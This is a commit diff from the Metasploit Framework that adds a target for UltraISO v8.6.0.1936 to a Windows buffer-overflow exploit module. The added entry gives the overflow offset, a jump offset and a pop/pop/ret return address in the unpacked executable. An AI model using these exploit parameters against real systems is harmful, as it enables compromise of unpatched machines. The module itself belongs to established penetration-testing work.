add a target for v8.6.0.1936
git-svn-id: file:///home/svn/framework3/trunk@8955 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e45a29fd4a
commit
b2f3e91c8b
|
@ -50,21 +50,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
# Tested OK on:
|
|
||||||
# v8.6.2.2011 (portable)
|
|
||||||
|
|
||||||
# BOF @ 0x005e1f8b
|
# BOF @ 0x005e1f8b
|
||||||
|
|
||||||
# The EXE base addr contains a bad char (nul). This prevents us from
|
# The EXE base addr contains a bad char (nul). This prevents us from
|
||||||
# using the super-elite multi-offset SEH exploitation method.
|
# using the super-elite multi-offset SEH exploitation method.
|
||||||
|
|
||||||
[ 'Windows Universal',
|
[ 'Windows - UltraISO v8.6.2.2011 portable',
|
||||||
{
|
{
|
||||||
'Offset' => 1100,
|
'Offset' => 1100,
|
||||||
'JmpOff' => 0x30, # offset from the end to our jmp
|
'JmpOff' => 0x30, # offset from the end to our jmp
|
||||||
'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
|
'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
|
[ 'Windows - UltraISO v8.6.0.1936',
|
||||||
|
{
|
||||||
|
'Offset' => 1100,
|
||||||
|
'JmpOff' => 0x30, # offset from the end to our jmp
|
||||||
|
'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
|
||||||
|
}
|
||||||
|
],
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => 'May 24 2007',
|
'DisclosureDate' => 'May 24 2007',
|
||||||
|
|
Loading…
Reference in New Issue